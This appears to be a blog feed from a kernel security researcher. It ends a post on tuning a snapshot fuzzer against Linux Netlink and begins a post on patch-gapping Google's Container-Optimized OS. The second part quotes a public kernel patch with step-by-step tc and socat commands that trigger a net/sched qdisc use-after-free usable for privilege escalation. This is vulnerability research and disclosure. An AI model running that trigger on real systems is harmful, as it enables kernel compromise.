<p>We basically were only doing Redqueen analysis for the entire fuzzing run of 14 hours wherein we got roughly 7 global iterations through per second. This means that Redqueen has become a prohibitive bottleneck. And we can tell by the amount of edges we discovered that it didn’t help much, at least not initially. This general pattern can be expected:</p>
<ol>
  <li>Early in the campaign we find new coverage often</li>
  <li>Inputs are being sent to Redqueen often</li>
</ol>

<p>That is not surprising. However, I found that there were <em>several</em> problems with the Redqueen implementation itself.</p>

<h3 id="issue-1">Issue-1</h3>
<p>The Redqueen paper also pointed out that sometimes input data is <em>transformed or encoded</em> before being compared. For instance, maybe input data is originally a <code class="language-plaintext highlighter-rouge">u64</code> value but is cast as an <code class="language-plaintext highlighter-rouge">i32</code> before being compared. If that were the case, we would never find the compare operand value for the <code class="language-plaintext highlighter-rouge">i32</code> in our input, so we would instead need to precompute a handful of common encodings and instead search for them. If we found the compare operand -&gt; encoding value, we’d then replace it with the same encoding of the other operand value. This makes sense. However, I had a logic bug in my implementation that attempted to solve the compare by generating <em>all possible encodings</em> for the found operand value instead of the single matching encoding. This increased the number of input patches to try by 15-20x.</p>

<p>The Redqueen paper also discovered that substituting the operand value but doing arithmetic to -1 or +1 the value was helpful in passing less/greater than comparisons. Remember we only hook compare operations that might set CPU flags and we don’t know what the program does with that information afterwards so this helps us bypass those checks as well. So in my erroneous implementation, that will 3x the number of patches we attempt which was already 15-20x too many, so that’s now around 45-60x too many patches to test.</p>

<p>So here’s a concrete example of what I was doing:</p>
<ol>
  <li>I receive a report of an operand value pair 0x1337 and 0xdead. These are 2 byte values.</li>
  <li>I was pre-computing every possible encoding for both pairs (this part is correct)</li>
  <li>If I found an encoding variant of 0x1337, say zero-extended to a <code class="language-plaintext highlighter-rouge">u32</code>, so 0x00001337 in the input, what I should be doing is applying that same encoding scheme to its partner value and creating 0x0000dead. Then I would replace 0x00001337 in the input with 0x0000dead.</li>
  <li>Instead, I was replacing 0x00001337 with <em>every possible similarly sized encoding of 0xdead</em></li>
</ol>

<h3 id="issue-2">Issue-2</h3>
<p>But wait, it gets worse! I was also not deduplicating operands based on the <code class="language-plaintext highlighter-rouge">RIP</code> value of the <code class="language-plaintext highlighter-rouge">cmp</code> instruction. Now normally, this can be ok because it allows you to potentially pass more dynamic comparisons where maybe both operand values are everchanging based on your input, say a checksum for example. However, with our throughput issues, and just wanting to do the bare-minimum here and defeat classic magic number comparisons, we can whittle down the number of input patches to try significantly by ignoring operands collected from <code class="language-plaintext highlighter-rouge">RIP</code> values we’ve already collected. We will rely on human-in-the-loop intervention if we ever need to defeat checksum type comparisons.</p>

<h3 id="issue-3">Issue-3</h3>
<p>To cap everything off, I was <em>creating all of the patched inputs</em> before trying them all serially. So I would pre-compute the patched inputs and stuff them in an input queue that Lucid would then prioritize over normal mutations. This led to my fuzzers being <code class="language-plaintext highlighter-rouge">SIGKILL</code> by the kernel as they started holding too many inputs in memory overnight. That is actually what ended this stage of experimentation. So this fuzzing stage was an abject disaster and we end up making a ton of improvement in the next iteration.</p>

<h3 id="issue-4">Issue-4</h3>
<p><em>Minor Note</em>: The Redqueen paper also employed a technique it called “colorization” wherein the input would be “colored” with random bytes up until the coloring changed the execution path of the input. So it would overwrite input data with random bytes and check to see if that affected the execution path. It started with the largest amount of randomization possible and then using something like binary search, would continue to shrink the portions of the input that would be colorized until its execution trace matched the original. The purpose of this is to make finding operand values in the input easier. Instead of an input being full of 0x0 values for instance, it now contains random data and when you capture the compare operand values, that random data in the capture is easier to spot in the input and you don’t run the risk of duplicating candidate insertions. This is actually genius. Lucid has this feature too, but I found that I was spending <strong>dozens of seconds</strong> colorizing large inputs. This is because we simply are so slow. I decided that the juice wasn’t the squeeze and made it such that in order to use colorization now, you have to pass a command line flag to opt into it.</p>

<h2 id="stage-4-fixing-redqueen">Stage 4: Fixing Redqueen</h2>
<p>Besides fixing the aforementioned logical errors, I added some new logic to the implementation. First, I started deduping operand values collected by the <code class="language-plaintext highlighter-rouge">RIP</code> value. So we no longer are doing Redqueen analysis for the same <code class="language-plaintext highlighter-rouge">RIP</code> compare operands more than once.</p>

<p>Additionally, I stopped collecting compare operands for values that weren’t at least 4 bytes in size. I figure that most mutators should be able to randomly pass 1 and 2-byte comparisons by sheer luck.</p>

<p>I also capped the number of Redqueen inputs you can put in the fuzzer’s test queue at 500. In my testing, we never even really approached 500 inputs in the test queue with the fixed encoding search, deduping <code class="language-plaintext highlighter-rouge">RIP</code>, and removing &lt; 32-byte compares. Previously, in the broken impelmentation, some fuzzers were carrying up to 1 million inputs to test!</p>

<p>Fixing the bugs and adding these two new things to the Redqueen code helped immensely and we achieved the following fuzzing run:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-22 11:47:27)]
globals: uptime: 0d 5h 49m 26s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 738.01K | iters/s: 34.30 | iters/s/f: 4.29
cpu: target: 98.1% | reset: 1.8% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16100 | last find: 0h 1m 10s | map: 24.57%
snapshot: dirty pages: 7290 | dirty / total: 0.00129% | reset memcpys: 557
corpus: inputs: 70366 | corpus size (MB): 877.591 | max input: 0x8088
</code></pre></div></div>

<p>As you can see, we doubled the throughput in half of the wall-clock time. We also didn’t use so much memory that the fuzzers got killed, so that’s good. Now that Redqueen is fixed, we can move on.</p>

<h3 id="redqueen-success-example">Redqueen Success Example</h3>
<p>Redqueen proved to be extremely helpful at finding new edges once we got away from the first 30 minutes or so of fuzzing. This was an awesome example I have to share:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-24 15:23:35)]
globals: uptime: 0d 0h 56m 54s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 96.08K | iters/s: 18.05 | iters/s/f: 2.26
cpu: target: 97.7% | reset: 1.4% | mutator: 0.0% | coverage: 0.0% | redqueen: 0.7% | misc: 0.0%
coverage: edges: 19920 | last find: 0h 0m 56s | map: 30.40%
snapshot: dirty pages: 8122 | dirty / total: 0.00144% | reset memcpys: 982
corpus: inputs: 2581 | corpus size (MB): 8.827 | max input: 0x10088
fuzzer-2: Fuzzing increased edge count 19475 -&gt; 19476 (+1)
fuzzer-1: Fuzzing increased edge count 19505 -&gt; 19507 (+2)
fuzzer-7: Fuzzing increased edge count 19194 -&gt; 19196 (+2)
fuzzer-4: Fuzzing increased edge count 19365 -&gt; 19370 (+5)
fuzzer-4: Redqueen increased edge count 19370 -&gt; 19721 (+351)
fuzzer-4: Redqueen increased edge count 19721 -&gt; 19784 (+63)
fuzzer-4: Redqueen increased edge count 19784 -&gt; 20925 (+1141)
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">fuzzer-4</code> starts off well behind the record edge count (<code class="language-plaintext highlighter-rouge">19920</code>) at <code class="language-plaintext highlighter-rouge">19365</code> edges discovered. It uses normal fuzzing mutation strategies and increases its edge count to <code class="language-plaintext highlighter-rouge">19370</code>. Then, that new-edge-finding input is sent to Redqueen for processing and Redqueen <em>dramatically</em> increases the fuzzer’s edge discovery progress. It rapidly discovers <code class="language-plaintext highlighter-rouge">1555</code> new edges which is an 8% increase over what it had just reached with fuzzing.</p>

<h2 id="stage-5-adding-seeds-mutator-tweaks-misc">Stage 5: Adding Seeds, Mutator Tweaks, Misc.</h2>
<h3 id="seeds">Seeds</h3>
<p>In this stage, the focus was mainly on creating seed inputs that would start the fuzzing campaign off with a lot of coverage. Up to this point, the most edges we ever discovered for this fuzzing target/harness was around 17.5k which we saw with our improved mutator but without compare coverage and running for around 14 hours. Now, that doesn’t mean that compare coverage is a hinderence to edge discovery, it just means that early on it’s not as effective at finding new edges as the normal fuzzing strategies were. With seeds, I was hoping to see a dramatic increase in the number of edges discovered because we’d be spoon feeding the mutator some of the complex inputs it needs to generate.</p>

<p>To create seed inputs, I actually just created an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object that hijacked the <code class="language-plaintext highlighter-rouge">sendmsg</code> libc invocation found in several command line utilities that normally come packaged in Ubuntu to interact with these subystems. I’m talking about <code class="language-plaintext highlighter-rouge">tc</code> for setting up qdiscs or the network scheduler for <code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code>, or <code class="language-plaintext highlighter-rouge">nft</code> to interact with <code class="language-plaintext highlighter-rouge">nf_tables</code> for <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code> etc. I simply hook the <code class="language-plaintext highlighter-rouge">sendmsg</code> libc function and have it dump the message contents to the terminal in hex. Here is an example:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@luciddev:/home/h0mbre/netlink_fuzzing# LD_PRELOAD=./hexdump_netlink.so tc qdisc add dev dummy0 root pfifo_fast
echo "3400000024000506fa2cd46800000000000000000700000000000000ffffffff000000000f000100706669666f5f666173740000"
</code></pre></div></div>
<p>Then I just pasted that <code class="language-plaintext highlighter-rouge">echo</code> string into the terminal and wrote the hex to a file and then wrapped those bytes in our fuzzing input data structure using Python:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span><span class="kn">import</span> <span class="nn">sys</span>

<span class="c1"># lf_protocols = {0: ROUTE, 1: XFRM, 2: NETFILTER, 3: CRYPTO}
</span>
<span class="k">def</span> <span class="nf">build_seed</span><span class="p">(</span><span class="n">hex_string</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">protocol</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">out_file</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
    <span class="c1"># Parse hex string into bytes
</span>    <span class="n">payload</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">hex_string</span><span class="p">)</span>
    <span class="n">payload_len</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>

    <span class="c1"># Lengths
</span>    <span class="n">lf_msg_hdr_len</span> <span class="o">=</span> <span class="mi">8</span>
    <span class="n">lf_input_hdr_len</span> <span class="o">=</span> <span class="mi">8</span>
    <span class="n">total_len</span> <span class="o">=</span> <span class="n">payload_len</span> <span class="o">+</span> <span class="n">lf_msg_hdr_len</span> <span class="o">+</span> <span class="n">lf_input_hdr_len</span>
    <span class="n">num_msgs</span> <span class="o">=</span> <span class="mi">1</span>

    <span class="c1"># Build buffer
</span>    <span class="n">buf</span>  <span class="o">=</span> <span class="n">total_len</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">num_msgs</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">protocol</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">payload_len</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">payload</span>

    <span class="c1"># Write to disk
</span>    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">out_file</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>

    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Wrote </span><span class="si">{</span><span class="n">out_file</span><span class="si">}</span><span class="s"> (</span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span><span class="si">}</span><span class="s"> bytes, payload=</span><span class="si">{</span><span class="n">payload_len</span><span class="si">}</span><span class="s"> bytes)"</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">4</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Usage: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> &lt;hex_string_file&gt; &lt;protocol_idx&gt; &lt;out_file&gt;"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="n">hex_file</span><span class="p">,</span> <span class="n">protocol_str</span><span class="p">,</span> <span class="n">out_file</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span>
    <span class="n">protocol</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">protocol_str</span><span class="p">)</span>

    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">hex_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="c1"># join lines, strip whitespace/newlines
</span>        <span class="n">hex_string</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">)</span>

    <span class="n">build_seed</span><span class="p">(</span><span class="n">hex_string</span><span class="p">,</span> <span class="n">protocol</span><span class="p">,</span> <span class="n">out_file</span><span class="p">)</span>
</code></pre></div></div>

<p>I think all in all I created ~30 seeds this way. I seeded each target protocol with at least 1 seed besides <code class="language-plaintext highlighter-rouge">NETLINK_CRYPTO</code>. The vast majority of the seeds became single message inputs and were simple in nature. For <code class="language-plaintext highlighter-rouge">nf_tables</code> specifically, I did create one input that was a series of messages to do stateful things like:
create a table, then create a set, then create an object, etc.</p>

<p>When fuzzing with seeds, our coverage increased dramatically. The seeds alone found over 17k edges. The lesson learned is nothing new, but having good seeds <strong>dramatically</strong> enhances your fuzzing efficiency.</p>

<h3 id="mutator-tweaks">Mutator Tweaks</h3>
<p>Since we’re so limited on throughput, I really wanted to make sure the inputs we were creating weren’t wasting cycles. On average we were spending over 98% of our CPU time executing the target and spending roughly 2% of the time doing snapshot resets. At that much target time, it’s clear where the bottleneck is and it’s not on anything the fuzzer itself is doing.</p>

<p>This kind of frees up to do more things in the fuzzer since it won’t slow the process down at all really. So what I decided to do was start hashing every input that the mutator created and comparing it to a database of the last <code class="language-plaintext highlighter-rouge">n</code> inputs, which I set arbitrarily at <code class="language-plaintext highlighter-rouge">500_000</code>. So now, every input we create is guaranteed to not be a repeat of the last 500k inputs. This helps a little when it comes to throughput because we’re not wasting precious CPU time re-running an often seen input.</p>

<p>I also made sure that when the mutator was choosing mutation strategies that it would no longer accept a NOP operation in place of an applied mutation. As an example, say we get an input from the corpus to mutate and that input is already the maximum size. Previously, if we were to randomly select the <code class="language-plaintext highlighter-rouge">ByteInsert</code> mutation method for this input it would effectively perform a NOP and return without doing anything. This is potentially a waste of input creation cycles. So I changed the function signature of the mutation strategies to return a <code class="language-plaintext highlighter-rouge">bool</code> where <code class="language-plaintext highlighter-rouge">true</code> meant the mutation was successfully applied and <code class="language-plaintext highlighter-rouge">false</code> meant that it was not. This way we can make sure at least <em>some</em> mutation is applied to each and every input.</p>

<p>Lastly, I keep a constant defined in the netlink mutator that is supposed to represent the percentage of inputs that we generate from scratch. It had previously been set at 5% and I lowered it to 1% now that we have seeds. I figured this would stop us from sending so much garbage while still allowing us to do something very random that still reaches some never before reached error handling paths. In addition to the rate change, I also refactored the random generation function to produce Netlink message-like inputs instead of random blobs of data of varying lengths. Now when we generate messages from scratch, they are at least shaped like valid Netlink messages.</p>

<h3 id="hitcount-change">Hitcount Change</h3>
<p>Some of the previous runs had absolutely exploded the corpus size, for instance in Stage 2 we had accumulated over 300k inputs in the corpus. I wanted to try and cut down on this bloat where possible because my intuition was that we were saving too many inputs. By default, Lucid would save an input if it discovered what it considered a new edge pair, eg a new basic block transition and it would save an input if it reached an edge pair a record number of times, called a hitcount. I bucket the hitcounts like AFL++ does:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// After a fuzzing iteration, Bochs will have updated the curr_map with</span>
    <span class="cd">/// hit counts for each edge pair that was reached during that fuzzing</span>
    <span class="cd">/// iteration. Instead of keeping the hit counts literal, we instead "bucket"</span>
    <span class="cd">/// the hit counts into categories. So for instance if we hit an edge pair</span>
    <span class="cd">/// 19 times, it will be placed in the 32 hitcount bucket. This algorithm</span>
    <span class="cd">/// is stolen directly from AFL++ who obviously has a ton of empirical</span>
    <span class="cd">/// evidence showing that this is beneficial</span>
    <span class="nd">#[inline(always)]</span>
    <span class="k">fn</span> <span class="nf">bucket</span><span class="p">(</span><span class="n">hitcount</span><span class="p">:</span> <span class="nb">u8</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u8</span> <span class="p">{</span>
        <span class="k">match</span> <span class="n">hitcount</span> <span class="p">{</span>
            <span class="mi">0</span> <span class="k">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
            <span class="mi">1</span> <span class="k">=&gt;</span> <span class="mi">1</span><span class="p">,</span>
            <span class="mi">2</span> <span class="k">=&gt;</span> <span class="mi">2</span><span class="p">,</span>
            <span class="mi">3</span> <span class="k">=&gt;</span> <span class="mi">4</span><span class="p">,</span>
            <span class="mi">4</span><span class="o">..=</span><span class="mi">7</span> <span class="k">=&gt;</span> <span class="mi">8</span><span class="p">,</span>
            <span class="mi">8</span><span class="o">..=</span><span class="mi">15</span> <span class="k">=&gt;</span> <span class="mi">16</span><span class="p">,</span>
            <span class="mi">16</span><span class="o">..=</span><span class="mi">31</span> <span class="k">=&gt;</span> <span class="mi">32</span><span class="p">,</span>
            <span class="mi">32</span><span class="o">..=</span><span class="mi">127</span> <span class="k">=&gt;</span> <span class="mi">64</span><span class="p">,</span>
            <span class="mi">128</span><span class="o">..=</span><span class="mi">255</span> <span class="k">=&gt;</span> <span class="mi">128</span><span class="p">,</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>So, if we move from a hitcount record on an edge pair of 4 and an input achieves a hitcount of 5, we don’t save it. But if the second input were to achieve a hitcount of 8, placing it in a new bucket, it would get saved. The ratio of these hitcount record setting inputs to edge pair discovery inputs was easily more than 10 to 1 and I felt like, especially early in the campaign, they were kind of just noise and not extremely helpful.</p>

<p>What I moved to was a model where I only considered new hitcount records if we were “starved” for new coverage. I created the command line option to set a “starved” for coverage threshold in wall-clock time, so once you reach that, the fuzzer starts saving hitcount record inputs to the corpus. During our longest fuzzing iteration, we reached the starved state of an hour multiple times and it seemed beneficial to the fuzzing campaign at that point to save these types of inputs as they soon after found new coverage.</p>

<h3 id="corpus-sampling">Corpus Sampling</h3>
<p>In another effort to avoid corpus bloat, I moved from a model where every fuzzer gets every other fuzzer’s entire corpus every sync-interval (tunable at runtime via command line), to a model where every fuzzer would instead randomly sample inputs from other fuzzers for the entirety of the sync-interval before it would put them all back on disk and randomly pick more to sample. For my longest campaign I set this sync interval to 1 hour.</p>

<h3 id="corpus-biasing">Corpus Biasing</h3>
<p>Lastly, I decided to play with how the corpus would provide inputs to the mutator. I implemented a couple of methods: <code class="language-plaintext highlighter-rouge">get_input_uniform</code> and <code class="language-plaintext highlighter-rouge">get_input_bias_new</code>. The former would just randomly select an input from the corpus with uniform distribution (including the sampled inputs) and the latter would bias the newer inputs in the corpus by a tunable rate. For my longest campaign I made it to where around 67% of the time, we’d pick a new input. Sampled inputs from other fuzzers were considered “new” as well in this due to the way I implemented the sampling. I have to say, I don’t think this made a bit of difference in our progress. I think in a long enough time horizon it probably doesnt matter much.</p>

<p>We ended up setting a substantial edge-finding record in just 15h of wall-clock time and under 2 million iterations.</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-25 21:22:08)]
globals: uptime: 0d 15h 47m 18s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 1.923M | iters/s: 27.05 | iters/s/f: 3.38
cpu: target: 97.7% | reset: 2.2% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 25866 | last find: 0h 4m 5s | map: 39.47%
snapshot: dirty pages: 9536 | dirty / total: 0.00169% | reset memcpys: 1475
corpus: inputs: 15689 | corpus size (MB): 44.976 | max input: 0x10088
</code></pre></div></div>

<p>So with all of the improvements over time we were able to go from 17k edges in 90 million iterations to 26k edges in 2 million iterations. I think the biggest positive change was probably just using seeds. I don’t think much of the core fuzzer tweaking (reducing corpus bloat, sampling inputs, avoiding hitcount inputs) made too much of a difference.</p>

<h2 id="conclusions">Conclusions</h2>
<h3 id="in-general">In General</h3>
<ul>
  <li>New snapshot method worked well and continued to be performant deep into campaign with thousands of dirty pages to reset</li>
  <li>Bochs emulation is the main bottleneck in the fuzzer, you probably need quite a bit of hardware to reach coverage saturation for complex targets</li>
  <li>Redqueen provided some huge boosts in edge discovery, but it needs a longer campaign to be beneficial</li>
  <li>Corpus bloat reduction didn’t massively affect the fuzzer, at least on our 4 day campaign, it seems benign enough to keep</li>
  <li>Biasing towards newer inputs didn’t seem to help the fuzzer find edges more efficiently</li>
  <li>Re-architecting mutators to be plug and play was as huge improvement, now creating a fuzzer is as easy as implementing a custom Mutator</li>
  <li>High-quality seeds are the easiest way to massively boost efficiency</li>
</ul>

<h3 id="per-stage">Per Stage</h3>
<ul>
  <li>Stage 1: High iteration count (88M) but only 16,917 edges - inefficient due to malformed, easily rejected inputs</li>
  <li>Stage 2: Dramatic efficiency gain - 17,740 edges in only 2.8M iterations (~35x more efficient)</li>
  <li>Stage 3: Broken Redqueen severely hurt performance - only 370K iterations in 14 hours</li>
  <li>Stage 4: Fixed Redqueen restored throughput, rare but massive edge discovery gains</li>
  <li>Stage 5: Seeds + optimizations achieved best results - 25,866 edges in 1.9M iterations</li>
</ul>

<h3 id="caveats">Caveats</h3>
<ul>
  <li>Fuzzing is extremely random, none of these results should be taken at face value besides massive 2-10x improvements</li>
  <li>Fuzzing is highly target dependent. Biasing towards new inputs, our corpus sampling interval, ignoring hit-counts, and reducing corpus bloat didn’t seem to have a massive negative effect with this specific target, but may be massively beneficial or harmful against others</li>
  <li>Ideally I would’ve created line graphs documenting coverage for each stage, but I didn’t have the presence of mind to do that, I apologize</li>
</ul>

<h2 id="whats-next">What’s Next?</h2>
<p>Now with the first fuzzing journey out of the way and some of the core features improved/fixed, we can move onto more earnest bug hunting. Next blog series we will pick a single target (instead of 4 like in this episode) and iterate on a purpose-built mutator again hoping to find bugs. We will do all of the things you do when you’re fuzzing for bugs: create good seeds, visualize coverage, find roadblocks, iterate on mutator, scale the fuzzing workload to many cores, etc.</p>

<p>Repo-wise I hope to clean up my local version this weekend and then find a way to standardize the build process of the entire thing, maybe we’ll Dockerize it I’m not sure yet.</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Linux" /><category term="Kernel" /><category term="Netlink" /><summary type="html"><![CDATA[Background We’ve spent a lot of time so far on this blog documenting the development process of Lucid, our full-system snapshot fuzzer, and I really wanted to start using it to do some real fuzzing. So the focus of this blog post will be documenting the process I had to take to get Lucid up and fuzzing on a real target. So far, Lucid has only worked on a toy harness/example, and so we need to see what kind of things need tweaking when a real target comes into play.]]></summary></entry><entry><title type="html">Patch-Gapping the Google Container-Optimized OS for $0</title><link href="https://h0mbre.github.io/Patch_Gapping_Google_COS/" rel="alternate" type="text/html" title="Patch-Gapping the Google Container-Optimized OS for $0" /><published>2025-02-13T00:00:00+00:00</published><updated>2025-02-13T00:00:00+00:00</updated><id>https://h0mbre.github.io/Patch_Gapping_Google_COS</id><content type="html" xml:base="https://h0mbre.github.io/Patch_Gapping_Google_COS/"><![CDATA[<h2 id="background">Background</h2>
<p>I’m trying to really focus this year on developing technically in a few ways. Part of that is reviewing kCTF entries. This helps me get a sense of what subsystems are producing the most bugs at the moment in the program and also keeps me up to date on buggy patterns to look for. Also I get to shamelessly steal players’ exploitation techniques as well. A lot of recent bugs have come from <code class="language-plaintext highlighter-rouge">/net/sched</code> so I was looking at patches for the subsystem and found a patch that claimed an exploitable UAF was possible. That patch is <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bc50835e83f60f56e9bec2b392fb5544f250fb6f">here</a>. I didn’t realize at the time, but “Lion Ackermann” mentioned in the patch as the bug discoverer (and presumably exploiter) is a kCTF player.</p>

<p>I checked and discovered that at the time I found the patch the COS 105 instance in kCTF was still vulnerable to this bug. I stopped looking then, but lesson learned, the LTS instance was also still vulnerable. I don’t know exactly how the rules work, but this bug was exploited as a 0day entry as per the public kCTF responses spreadsheet in December, but at the time I started working on it, there were no patch links in the spreadsheet for this bug and the instances remained unpatched.</p>

<p>At this point I started trying to figure out the bug and possibly exploit it. My goal was to patch-gap the COS 105 instance with a 1day entry. Shortly after I began investigating the bug, a new release was announced, but luckily the new instances would be vulnerable as well as they had also not been patched. Since the COS 105 slot was unexploited, and the upcoming COS 105 instance would also be vulnerable, I mistakenly took this as a signal to not rush as the instance would probably remain unexploited while I worked on the project slowly. In hindsight, I should’ve worked harder on this as the COS 105 instance was exploited a few hours before I finished. It may be moot anyways since the bug was exploited previously in the program as a 0day, still not sure about that. Anyways, I encountered some self-inflicted roadblocks that really hindered my progress, we’ll get into those. Next time I’ll work harder and dedicate more time to the effort instead of just a few hours here and there at night.</p>

<h2 id="patch-analysis">Patch Analysis</h2>
<p>The patch text is very descriptive and provides a nice proof-of-concept to reproduce the buggy condition:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">net: sched: Disallow replacing of child qdisc from one parent to another
Lion Ackermann was able to create a UAF which can be abused for privilege
escalation with the following script

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation do demonstrate uaf
tc class add dev lo classid 1:1 drr

step3. a class for nesting
tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

step5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.
tc class add dev lo classid 3:1 drr

step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 limit 1000p
 qdisc drr 3: dev lo parent 1:2

step10. trigger the bug &lt;=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:0

step 11. Redisplay again the qdiscs/classes

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 1:3 root leaf 4: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
 qdisc drr 3: dev lo parent 1:2

Observe that a) parent for 4:0 does not change despite the replace request.
There can only be one parent.  b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12.  send one packet to plug
</span><span class="gp">echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$</span><span class="o">((</span>0x10001<span class="o">))</span>
<span class="go">step13.  send one packet to the grafted fifo
</span><span class="gp">echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$</span><span class="o">((</span>0x10003<span class="o">))</span>
<span class="go">
step14. lets trigger the uaf
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not
a delete from one node(3:1) and add to another node (1:3) as in step10.
While we could "fix" with a more complex approach there could be
consequences to expectations so the patch takes the preventive approach of
"disallow such config".
</span></code></pre></div></div>

<p>The bug here is that a qdisc can be “re-parented” to a class that is not its original parent. This kind of logic was not intended. When you create these types of classes that can have qdiscs attached, a default qdisc is allocated and you can graft a new qdisc to the class afterwards to replace the current qdisc. So you can see that <code class="language-plaintext highlighter-rouge">class 1:3</code> is first created and then we graft a qdisc onto it in step 8. This will free the default qdisc and instantiate this one in its place and attach it to the class.</p>

<p>The bug however, lets you graft that qdisc (handle 4:0) onto a different class by using the same grafting mechanism that we used on 3:1 but now we’re grafting the same qdisc onto two classes. The patch points out the side effects of this bug are basically this:</p>
<ol>
  <li>From qdisc 4:0’s point of view, it’s parent is still class 3:1, that is never changed</li>
  <li>From class 3:1’s perspective, qdisc 4:0 is still its child qdisc</li>
  <li>From class 1:3’s perspective, qdisc 4:0 is now its child qdisc</li>
  <li>The refcount on the qdisc is now 2: 1 from the initial graft onto 3:1 and another 1 from the re-parent graft onto 1:3</li>
</ol>

